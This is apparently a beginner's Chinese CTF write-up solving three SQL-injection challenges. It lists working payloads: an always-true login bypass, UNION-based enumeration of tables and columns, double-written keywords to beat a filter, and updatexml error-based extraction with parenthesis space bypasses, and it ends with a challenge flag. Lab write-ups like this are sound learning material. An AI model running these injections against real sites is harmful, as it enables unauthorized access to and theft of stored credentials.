小白一个,记录一下解题过程,如有错误请指正!
1.这里我们使用一句话万能密码就可以了,记得加上#
1' or '1'='1'#
2.登录就可以拿到flag
网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~
1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag
2.猜测flag应该是放在某个字段里了,我们用联合注入(union)看一下列数
1' union select 1,2,3#
登录成功,列数再加1,发现报错了,说明列数有三列,第二第三列有回显
1' union select 1,2,3,4#
3.开始爆数据库
1' union select 1,2,database()#
4.数据库名为geek,爆表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
5.很显然l0ve1ysq1是我们想要的表,谁让他和题目长得很像呢~,爆字段
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
6.flag应该在username或者password里了,用concat_ws函数连起来全部看一下。
1' union select 1,2,group_concat(concat_ws('~',username,password)) from geek.l0ve1ysq1#
太长了看不完,直接看网页源代码即可
1.还是先用万能句试一下,发现不行了,应该是设置了关键字过滤,用burp看一下过滤了那些关键字
or,and,union,select,where等都被过滤了,试了一下改大小写,双写,发现双写注入是可以的
1' oorr '1'='1'#
2.那我们就是用双写注入,查一下列数,发现还是只有三列
1' ununionion selselectect 1,2,3#
3.爆数据库
1' ununionion selselectect 1,2,database()# 
4.熟悉的数据库名,开始爆表名
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
5.爆字段
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'# 
6.查看username,password两个字段
1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql# 
7.查看网页源代码就可以看到完整的flag了
1.在这一题发现万能句,双写都不能用了,总是出现这样一个页面
2.应该还是把某些关键字过滤掉了,用burp再fuzz一下,发现空格,union,*,=都被过滤了,但是updatexml和extractvalue没被过滤,可以考虑使用报错注入
3.因为空格和*号都被过滤掉了,就不能使用/**/绕过空格了,不过可以使用()绕过,爆数据库
1'or(updatexml(1,concat('~',(select(database()))),1))#
4.又是熟悉的数据库名,开始爆表名
1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('%geek%'))),1))#
5.爆字段
1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('%H4rDsq1%'))),1))#
6.查看username,password ,不过根据经验应该是在password里是没错了
1'or(updatexml(1,concat('~',(select(group_concat(concat_ws('~',username,password)))from(geek.H4rDsq1))),1))#
7.没显示完全,因为updatexml函数只能显示前32位,但是mid,substr函数也被过滤掉了,那可以使用right函数
1'or(updatexml(1,concat('~',(select(right(concat_ws('~',username,password),30))from(geek.H4rDsq1))),1))# 
8.拼起来就是flag啦
flag{651cd7be-7e7e-4463-9bee-9b451fc0039d}
参考文章:
https://cloud.tencent.com/developer/article/1740429
https://www.cnblogs.com/Mr-small/p/13473910.html
https://www.cnblogs.com/sipc-love/p/14266070.html